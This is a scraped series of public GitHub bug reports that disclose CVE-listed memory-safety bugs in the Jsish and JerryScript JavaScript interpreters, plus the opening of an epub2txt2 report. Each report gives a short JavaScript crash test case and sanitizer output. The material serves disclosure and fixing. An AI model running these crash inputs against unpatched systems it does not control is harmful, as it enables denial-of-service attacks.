Jsish v3.5.0 was discovered to contain a heap buffer overflow via RegExp_constructor in src/jsiRegexp.c. This vulnerability can lead to a Denial of Service (DoS).

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed

hope-fly opened this issue

Dec 24, 2021

· 0 comments

**Comments**

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=88&v=4)

**Jsish revision**

Commit: 9fa798e

Version: v3.5.0

**Build platform**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

export CFLAGS='\-fsanitize=address'
make

**Test case**

function JSEtest() {
  var bound;
  var t;
  bound \= RegExp.bind('baz', 'quuux');
  t \= new bound('i');
}

try {
  JSEtest();
} catch (e) {
}

​

**Execution steps & Output**

$ ./jsish/jsish poc.js

==21392==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x604000018e48 at pc 0x55de4613ce12 bp 0x7ffdf013bf00 sp 0x7ffdf013bef0
WRITE of size 8 at 0x604000018e48 thread T0
    #0 0x55de4613ce11 in RegExp\_constructor src/jsiRegexp.c:176
    #1 0x55de4619b818 in jsi\_FuncCallSub src/jsiProto.c:244
    #2 0x55de46118fec in jsi\_FunctionInvoke src/jsiFunc.c:777
    #3 0x55de46118fec in Jsi\_FunctionInvoke src/jsiFunc.c:789
    #4 0x55de46194ad6 in jsi\_FuncBindCall src/jsiProto.c:299
    #5 0x55de4619b818 in jsi\_FuncCallSub src/jsiProto.c:244
    #6 0x55de4646571a in jsiFunctionSubCall src/jsiEval.c:796
    #7 0x55de4646571a in jsiEvalFunction src/jsiEval.c:837
    #8 0x55de4646571a in jsiEvalCodeSub src/jsiEval.c:1264
    #9 0x55de4647915e in jsi\_evalcode src/jsiEval.c:2204
    #10 0x55de4619c834 in jsi\_FuncCallSub src/jsiProto.c:220
    #11 0x55de464655ab in jsiFunctionSubCall src/jsiEval.c:796
    #12 0x55de464655ab in jsiEvalFunction src/jsiEval.c:837
    #13 0x55de464655ab in jsiEvalCodeSub src/jsiEval.c:1264
    #14 0x55de4647915e in jsi\_evalcode src/jsiEval.c:2204
    #15 0x55de4647d274 in jsi\_evalStrFile src/jsiEval.c:2665
    #16 0x55de4616c66a in Jsi\_Main src/jsiInterp.c:936
    #17 0x55de4697103a in jsi\_main src/main.c:47
    #18 0x7ff1757adbf6 in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x21bf6)
    #19 0x55de46100969 in \_start (/usr/local/bin/jsish+0xe8969)

0x604000018e48 is located 8 bytes to the left of 48-byte region \[0x604000018e50,0x604000018e80)
allocated by thread T0 here:
    #0 0x7ff17641cd28 in \_\_interceptor\_calloc (/usr/lib/x86\_64-linux-gnu/libasan.so.4+0xded28)
    #1 0x55de46171aa4 in Jsi\_Calloc src/jsiUtils.c:57

SUMMARY: AddressSanitizer: heap-buffer-overflow src/jsiRegexp.c:176 in RegExp\_constructor
Shadow bytes around the buggy address:
  0x0c087fffb170: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa
  0x0c087fffb180: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa
  0x0c087fffb190: fa fa 00 00 00 00 00 00 fa fa fd fd fd fd fd fa
  0x0c087fffb1a0: fa fa 00 00 00 00 00 00 fa fa fd fd fd fd fd fa
  0x0c087fffb1b0: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa
\=>0x0c087fffb1c0: fa fa 00 00 00 00 00 04 fa\[fa\]00 00 00 00 00 00
  0x0c087fffb1d0: fa fa fd fd fd fd fd fa fa fa 00 00 00 00 00 06
  0x0c087fffb1e0: fa fa 00 00 00 00 00 00 fa fa fd fd fd fd fd fa
  0x0c087fffb1f0: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa
  0x0c087fffb200: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa
  0x0c087fffb210: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb

Credits: Found by OWL337 team.

pcmacdon referenced this issue

Dec 27, 2021

FossilOrigin-Name: ef9d33b5fa866924ce4876daaf706343aec976bc09de6eba0bcb15c7eef3b50d

2 participants

 ![@pcmacdon](https://avatars.githubusercontent.com/u/20356998?s=52&v=4)![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=52&v=4)

CVE-2021-46477: Heap-buffer-overflow  src/jsiRegexp.c:176 in RegExp_constructor · Issue #63 · pcmacdon/jsish

Jsish v3.5.0 was discovered to contain a memory leak via linenoise at src/linenoise.c.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed

hope-fly opened this issue

Dec 24, 2021

· 0 comments

**Comments**

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=88&v=4)

**Jsish revision**

Commit: 9fa798e

Version: v3.5.0

**Build platform**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

export CFLAGS='\-fsanitize=address'
make

**Test case**

var JSEtest \= \[
    'aa',
    'bb',
    'hhh'
\];
try { Number.bind(console.input('listNum' + JSEtest), 4)(); } catch (e) {};
try { (1 \>> y).toFixed.bind(2, 4)(); } catch (e) {};
(1 \>> y).toFixed.bind(2, 4)();

​

**Execution steps & Output**

$ ./jsish/jsish poc.js

listNum \[object Object\]
/home/user/poc.js:10: error: apply Number.toFixed to a non-number object
ERROR:
=================================================================
ERROR: LeakSanitizer: detected memory leaks
Direct leak of 1 byte(s) in 1 object(s) allocated from:
    #0 0x7f0e5412d538 in strdup (/usr/lib/x86\_64-linux-gnu/libasan.so.4+0x77538)
    #1 0x56523c6594ad in linenoise src/linenoise.c:1061
SUMMARY: AddressSanitizer: 1 byte(s) leaked in 1 allocation(s).

Credits: Found by OWL337 team.

1 participant

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=52&v=4)

CVE-2021-46481: Memory leaks in linenoise src/linenoise.c:1061 · Issue #55 · pcmacdon/jsish

Jsish v3.5.0 was discovered to contain a heap buffer overflow via jsi_ArraySliceCmd in src/jsiArray.c. This vulnerability can lead to a Denial of Service (DoS).

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed

hope-fly opened this issue

Dec 24, 2021

· 0 comments

**Comments**

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=88&v=4)

**Jsish revision**

Commit: 9fa798e

Version: v3.5.0

**Build platform**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

export CFLAGS='\-fsanitize=address'
make

**Test case**

var arr \= \[
    'aa',
    'bb'
\];
var results \= \[\];
arr.findIndex(function (V) {
    if (results.length \=== 0) {
        arr.slice(1, arr.push('cc'));
    }
});
results \= \[\];
arr \= \[
    'mm'
\];
arr.findIndex(function (V) {
    if (results.length \=== 0) {
        arr.push('cc');
        arr\[1\] \= 'nn';
    }
    results.push(V);
});

​

**Execution steps & Output**

$ ./jsish/jsish poc.js

==87153==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60c000018cc0 at pc 0x556c1807d671 bp 0x7ffc37cea3f0 sp 0x7ffc37cea3e0
READ of size 8 at 0x60c000018cc0 thread T0
    #0 0x556c1807d670 in jsi\_ArraySliceCmd src/jsiArray.c:912
    #1 0x556c1804c818 in jsi\_FuncCallSub src/jsiProto.c:244
    #2 0x556c1831671a in jsiFunctionSubCall src/jsiEval.c:796
    #3 0x556c1831671a in jsiEvalFunction src/jsiEval.c:837
    #4 0x556c1831671a in jsiEvalCodeSub src/jsiEval.c:1264
    #5 0x556c1832a15e in jsi\_evalcode src/jsiEval.c:2204
    #6 0x556c1804d834 in jsi\_FuncCallSub src/jsiProto.c:220
    #7 0x556c17fc9fec in jsi\_FunctionInvoke src/jsiFunc.c:777
    #8 0x556c17fc9fec in Jsi\_FunctionInvoke src/jsiFunc.c:789
    #9 0x556c1808ac0b in jsi\_ArrayFindSubCmd src/jsiArray.c:576
    #10 0x556c1808ac0b in jsi\_ArrayFindIndexCmd src/jsiArray.c:666
    #11 0x556c1804c818 in jsi\_FuncCallSub src/jsiProto.c:244
    #12 0x556c1831671a in jsiFunctionSubCall src/jsiEval.c:796
    #13 0x556c1831671a in jsiEvalFunction src/jsiEval.c:837
    #14 0x556c1831671a in jsiEvalCodeSub src/jsiEval.c:1264
    #15 0x556c1832a15e in jsi\_evalcode src/jsiEval.c:2204
    #16 0x556c1832e274 in jsi\_evalStrFile src/jsiEval.c:2665
    #17 0x556c1801d66a in Jsi\_Main src/jsiInterp.c:936
    #18 0x556c1882203a in jsi\_main src/main.c:47
    #19 0x7f116a702bf6 in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x21bf6)
    #20 0x556c17fb1969 in \_start (/usr/local/bin/jsish+0xe8969)

0x60c000018cc0 is located 0 bytes to the right of 128-byte region \[0x60c000018c40,0x60c000018cc0)
allocated by thread T0 here:
    #0 0x7f116b371f30 in realloc (/usr/lib/x86\_64-linux-gnu/libasan.so.4+0xdef30)
    #1 0x556c18022972 in Jsi\_Realloc src/jsiUtils.c:47

SUMMARY: AddressSanitizer: heap-buffer-overflow src/jsiArray.c:912 in jsi\_ArraySliceCmd
Shadow bytes around the buggy address:
  0x0c187fffb140: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c187fffb150: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
  0x0c187fffb160: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa
  0x0c187fffb170: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c187fffb180: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
\=>0x0c187fffb190: 00 00 00 00 00 00 00 00\[fa\]fa fa fa fa fa fa fa
  0x0c187fffb1a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c187fffb1b0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c187fffb1c0: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa
  0x0c187fffb1d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c187fffb1e0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb

pcmacdon pushed a commit that referenced this issue

Dec 26, 2021

FossilOrigin-Name: 55bccdeeaece3664702082db63a25cac260ed809ceac21416f5d681a943905d7

pcmacdon pushed a commit that referenced this issue

Dec 26, 2021

…x to issue #64

FossilOrigin-Name: 18c3a7084f0cdf0aaf9dd27a591d6ed75f33b00be55439bd6d2acb979a6f1207

2 participants

 ![@pcmacdon](https://avatars.githubusercontent.com/u/20356998?s=52&v=4)![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=52&v=4)

CVE-2021-46475: Heap-buffer-overflow src/jsiArray.c:912 in jsi_ArraySliceCmd · Issue #64 · pcmacdon/jsish

Jsish v3.5.0 was discovered to contain a heap buffer overflow via jsiClearStack in src/jsiEval.c. This vulnerability can lead to a Denial of Service (DoS).

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed

hope-fly opened this issue

Dec 24, 2021

· 0 comments

**Comments**

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=88&v=4)

**Jsish revision**

Commit: 9fa798e

Version: v3.5.0

**Build platform**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

export CFLAGS='\-fsanitize=address'
make

**Test case**

var a \= Math.sin(Math.PI/2);  
if (a \=== 1) {
    switch (a) {
      case assert(accessed, 'accessed !== true'): break;
      default: throw "FAIL";
    }
}

​

**Execution steps & Output**

$ ./jsish/jsish poc.js

==52181==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6250000000f8 at pc 0x55ff51f35d58 bp 0x7fff48257760 sp 0x7fff48257750
READ of size 8 at 0x6250000000f8 thread T0
    #0 0x55ff51f35d57 in jsiClearStack src/jsiEval.c:120
    #1 0x55ff51f35d57 in jsiPop src/jsiEval.c:200
    #2 0x55ff51f35d57 in jsiEvalCodeSub src/jsiEval.c:1390
    #3 0x55ff51f4215e in jsi\_evalcode src/jsiEval.c:2204
    #4 0x55ff51f46274 in jsi\_evalStrFile src/jsiEval.c:2665
    #5 0x55ff51c3566a in Jsi\_Main src/jsiInterp.c:936
    #6 0x55ff5243a03a in jsi\_main src/main.c:47
    #7 0x7fab5e008bf6 in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x21bf6)
    #8 0x55ff51bc9969 in \_start (/usr/local/bin/jsish+0xe8969)

0x6250000000f8 is located 8 bytes to the left of 8192-byte region \[0x625000000100,0x625000002100)
allocated by thread T0 here:
    #0 0x7fab5ec77f30 in realloc (/usr/lib/x86\_64-linux-gnu/libasan.so.4+0xdef30)
    #1 0x55ff51c3a972 in Jsi\_Realloc src/jsiUtils.c:47

SUMMARY: AddressSanitizer: heap-buffer-overflow src/jsiEval.c:120 in jsiClearStack
Shadow bytes around the buggy address:
  0x0c4a7fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c4a7fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c4a7fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c4a7fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c4a7fff8000: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
\=>0x0c4a7fff8010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\[fa\]
  0x0c4a7fff8020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c4a7fff8030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c4a7fff8040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c4a7fff8050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c4a7fff8060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
\==52181\==ABORTING

Credits: Found by OWL337 team.

1 participant

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=52&v=4)

CVE-2021-46478: Heap-buffer-overflow src/jsiEval.c:120 in jsiClearStack · Issue #60 · pcmacdon/jsish

Jsish v3.5.0 was discovered to contain a heap buffer overflow via NumberConstructor at src/jsiNumber.c.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed

hope-fly opened this issue

Dec 24, 2021

· 0 comments

**Comments**

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=88&v=4)

**Jsish revision**

Commit: 9fa798e

Version: v3.5.0

**Build platform**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

export CFLAGS='\-fsanitize=address'
make

**Test case**

var a \= \[
    \[0\]
\];
var actual \= (Number).bind("abcdab", \[
    \[0\]
\].indexOf("abcdab", 99))();

​

**Execution steps & Output**

$ ./jsish/jsish poc.js

==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x604000018b40 at pc 0x55803d35220a bp 0x7fff119980c0 sp 0x7fff119980b0
WRITE of size 4 at 0x604000018b40 thread T0
    #0 0x55803d352209 in NumberConstructor src/jsiNumber.c:93
    #1 0x55803d325818 in jsi\_FuncCallSub src/jsiProto.c:244
    #2 0x55803d2a2fec in jsi\_FunctionInvoke src/jsiFunc.c:777
    #3 0x55803d2a2fec in Jsi\_FunctionInvoke src/jsiFunc.c:789
    #4 0x55803d31ead6 in jsi\_FuncBindCall src/jsiProto.c:299
    #5 0x55803d325818 in jsi\_FuncCallSub src/jsiProto.c:244
    #6 0x55803d5ef71a in jsiFunctionSubCall src/jsiEval.c:796
    #7 0x55803d5ef71a in jsiEvalFunction src/jsiEval.c:837
    #8 0x55803d5ef71a in jsiEvalCodeSub src/jsiEval.c:1264
    #9 0x55803d60315e in jsi\_evalcode src/jsiEval.c:2204
    #10 0x55803d607274 in jsi\_evalStrFile src/jsiEval.c:2665
    #11 0x55803d2f666a in Jsi\_Main src/jsiInterp.c:936
    #12 0x55803dafb03a in jsi\_main src/main.c:47
    #13 0x7ff56e70cbf6 in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x21bf6)
    #14 0x55803d28a969 in \_start (/usr/local/bin/jsish+0xe8969)

0x604000018b40 is located 1 bytes to the right of 47-byte region \[0x604000018b10,0x604000018b3f)
allocated by thread T0 here:
    #0 0x7ff56f37bd28 in \_\_interceptor\_calloc (/usr/lib/x86\_64-linux-gnu/libasan.so.4+0xded28)
    #1 0x55803d2fbaa4 in Jsi\_Calloc src/jsiUtils.c:57

SUMMARY: AddressSanitizer: heap-buffer-overflow src/jsiNumber.c:93 in NumberConstructor
Shadow bytes around the buggy address:
  0x0c087fffb110: fa fa fd fd fd fd fd fa fa fa 00 00 00 00 00 00
  0x0c087fffb120: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa
  0x0c087fffb130: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa
  0x0c087fffb140: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 07
  0x0c087fffb150: fa fa 00 00 00 00 00 00 fa fa fd fd fd fd fd fa
\=>0x0c087fffb160: fa fa 00 00 00 00 00 07\[fa\]fa 00 00 00 00 00 00
  0x0c087fffb170: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa
  0x0c087fffb180: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa
  0x0c087fffb190: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa
  0x0c087fffb1a0: fa fa 00 00 00 00 00 00 fa fa fd fd fd fd fd fa
  0x0c087fffb1b0: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb

Credits: Found by OWL337 team.

pcmacdon pushed a commit that referenced this issue

Dec 24, 2021

FossilOrigin-Name: 1a56f37adc0f00cd3e9e467873c4578299d4ac474be20f2e2658a05da20c32bc

2 participants

 ![@pcmacdon](https://avatars.githubusercontent.com/u/20356998?s=52&v=4)![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=52&v=4)

CVE-2021-46482: Heap-buffer-overflow src/jsiNumber.c:93 in NumberConstructor · Issue #66 · pcmacdon/jsish

There is an Assertion ''ecma_is_value_boolean (base_value)'' failed at /jerry-core/ecma/operations/ecma-get-put-value.c in Jerryscript 3.0.0.

**JerryScript revision**

Commit: 51da1551

Version: v3.0.0

**Build platform**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

./tools/build.py --clean --debug --profile=es2015-subset --compile-flag=-fsanitize=address --compile-flag=-m32 --lto=off --logging=on --line-info=on --error-message=on --system-allocator=on --stack-limit=20

**Test case**

function JSEtest(f, n \= 1000) {
  for (let i \= 0; i < n; i++) {
    f();
  }
}

JSEtest(function () {
  class M {
    constructor() {
      this.\_x \= 45;
    }

    get foo() {
      return this.\_x;
    }

  }

  class N extends M {
    constructor(x \= () \=> super.foo) {
      super();
      x() \=== 45;
    }

    x(x \= () \=> super.foo) {
      return x();
    }

  }

  new N().x() \=== 45;
});

​

**Execution steps & Output**

version 3.0.0

$ ./jerryscript/build/bin/jerry poc.js

ICE: Assertion 'ecma\_is\_value\_boolean (base\_value)' failed at /root/jerryscript/jerry-core/ecma/operations/ecma-get-put-value.c(ecma\_op\_get\_value\_object\_base):205.
Error: ERR\_FAILED\_INTERNAL\_ASSERTION

Credits: Found by OWL337 team.

CVE-2021-44993: Assertion 'ecma_is_value_boolean (base_value)' failed in ecma_op_get_value_object_base (ecma-get-put-value). · Issue #4876 · jerryscript-project/jerryscript

Jsish v3.5.0 was discovered to contain a heap buffer overflow via jsiEvalCodeSub in src/jsiEval.c. This vulnerability can lead to a Denial of Service (DoS).

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed

hope-fly opened this issue

Dec 24, 2021

· 1 comment

**Comments**

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=88&v=4)

**Jsish revision**

Commit: 9fa798e

Version: v3.5.0

**Build platform**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

export CFLAGS='\-fsanitize=address'
make

**Test case**

assert(newObj.hasOwnProperty("prop")).throws(SyntaxError, function () {
    eval("'use strict'; function \_13\_0\_7\_fun() {eval = 42;};");
    \_13\_0\_7\_fun();
});

​

**Execution steps & Output**

$ ./jsish/jsish poc.js
=================================================================
========ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6250000028f8 at pc 0x55bcbd952990 bp 0x7ffd837e9530 sp 0x7ffd837e9520
READ of size 8 at 0x6250000028f8 thread T0
    #0 0x55bcbd95298f in jsiEvalCodeSub src/jsiEval.c:1366
    #1 0x55bcbd95c15e in jsi\_evalcode src/jsiEval.c:2204
    #2 0x55bcbd960274 in jsi\_evalStrFile src/jsiEval.c:2665
    #3 0x55bcbd64f66a in Jsi\_Main src/jsiInterp.c:936
    #4 0x55bcbde5403a in jsi\_main src/main.c:47
    #5 0x7f3599d46bf6 in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x21bf6)
    #6 0x55bcbd5e3969 in \_start (/usr/local/bin/jsish+0xe8969)

0x6250000028f8 is located 8 bytes to the left of 8192-byte region \[0x625000002900,0x625000004900)
allocated by thread T0 here:
    #0 0x7f359a9b5f30 in realloc (/usr/lib/x86\_64-linux-gnu/libasan.so.4+0xdef30)
    #1 0x55bcbd654972 in Jsi\_Realloc src/jsiUtils.c:47

SUMMARY: AddressSanitizer: heap-buffer-overflow src/jsiEval.c:1366 in jsiEvalCodeSub
Shadow bytes around the buggy address:
  0x0c4a7fff84c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c4a7fff84d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c4a7fff84e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c4a7fff84f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c4a7fff8500: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
\=>0x0c4a7fff8510: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\[fa\]
  0x0c4a7fff8520: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c4a7fff8530: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c4a7fff8540: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c4a7fff8550: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c4a7fff8560: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
\========ABORTING

Credits: Found by OWL337 team.

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=88&v=4)

This issue may have a correlation with #56, but I'm not for sure.

1 participant

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=52&v=4)

CVE-2021-46474: Heap-buffer-overflow src/jsiEval.c:1366 in jsiEvalCodeSub · Issue #57 · pcmacdon/jsish

There is an Assertion ''ecma_object_is_typedarray (obj_p)'' failed at /jerry-core/ecma/operations/ecma-typedarray-object.c in Jerryscript 3.0.0.

**JerryScript revision**

Commit: 51da1551 Version: v3.0.0

Commit: 8ba0d1b Version: v2.4.0

**Build platform**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

./tools/build.py --clean --debug --profile=es2015-subset --compile-flag=-fsanitize=address --compile-flag=-m32 --lto=off --logging=on --line-info=on --error-message=on --system-allocator=on --stack-limit=20

**Test case**

function isPoT(obj, name, type) {
  let desc;
  desc \= Object.getOwnPropertyDescriptor(obj, name);
  return typeof type \=== 'undefined' || typeof desc.value \=== type;
}

function getPs(obj, type) {
  let properties \= \[\];

  for (let name of Object.getOwnPropertyNames(obj)) {
    if (isPoT(obj, name, type)) {
      properties.push(name);
    }
  }

  return properties;
}

function\* genObj(root \= this, level \= 0) {
  if (level \> 4) {
    return;
  }

  let obj\_names \= getPs(root, 'object');

  for (let obj\_name of obj\_names) {
    if (obj\_name.startsWith('$')) {
      continue;
    } 

    let obj \= root\[obj\_name\];
    yield obj;
    yield\* genObj(obj, level + 1);
  }
}

function JSEtestObj() {
  let objects \= \[\];

  for (let obj of genObj()) {
    if (!objects.includes(obj)) {
      objects.push(obj);
    }
  }

  return objects;
}

function JSEtestFunc(obj) {
  return getPs(obj, 'function');
}

const thrower \= new Proxy({}, {
  get() {
    throw 0xc0defefe;
  }

});

for (let o of JSEtestObj()) {
  for (let f of JSEtestFunc(o)) {
    const arityPlusOne \= o\[f\].length + 1;
    try {
      o\[f\](Array(arityPlusOne).fill(thrower));
    } catch (e) {
      if (\`${e}\`.includes('1')) {
        try {
          new o\[f\](Array(arityPlusOne).fill(thrower));
        } catch (e) {}
      } else {
      }
    }
  }
}

​

**Execution steps & Output**

Version: v3.0.0

$ ./jerryscript/build/bin/jerry poc.js

ICE: Assertion 'ecma\_object\_is\_typedarray (obj\_p)' failed at /root/jerryscript/jerry-core/ecma/operations/ecma-typedarray-object.c(ecma\_get\_typedarray\_id):764.
Error: ERR\_FAILED\_INTERNAL\_ASSERTION

Version: v2.4.0

$ ~/jerryscript-2.4.0/build/bin/jerry poc.js
Script Error: assertion failed
Script backtrace (top 5):
 0: poc.js:72

Credits: Found by OWL337 team.

CVE-2021-44992: Assertion 'ecma_object_is_typedarray (obj_p)' failed in ecma-typedarray-object(ecma_get_typedarray_id) · Issue #4875 · jerryscript-project/jerryscript

xhtml_translate_entity in xhtml.c in epub2txt (aka epub2txt2) through 2.02 allows a stack-based buffer overflow via a crafted EPUB document.

**Description**

A stack-buffer-overflow was discovered in epub2txt2.  
The issue is being triggered in function xhtml\_translate\_entity() at src/xhtml.c:576

**Version**

Version 2.02 (Lastest)

**Environment**

Ubuntu 18.04, 64bit

**Reproduce****Command**

    git clone the Lastest Version firstly.
    make && make install
    ./epub2txt poc
    

POC file at the bottom of this report.

**With ASAN**

Note: You can use ASAN for more direct verification.

    Compile program with address sanitizer with this command:
    VERSION := 2.02
    CC      := gcc
    CFLAGS  := -Wall -fPIC -fPIE
    LDLAGS  := -pie 
    DESTDIR :=
    PREFIX  := /usr
    BINDIR  := /bin
    MANDIR  := /share/man
    APPNAME := epub2txt
    
    TARGET	:= epub2txt 
    SOURCES := $(shell find src/ -type f -name *.c)
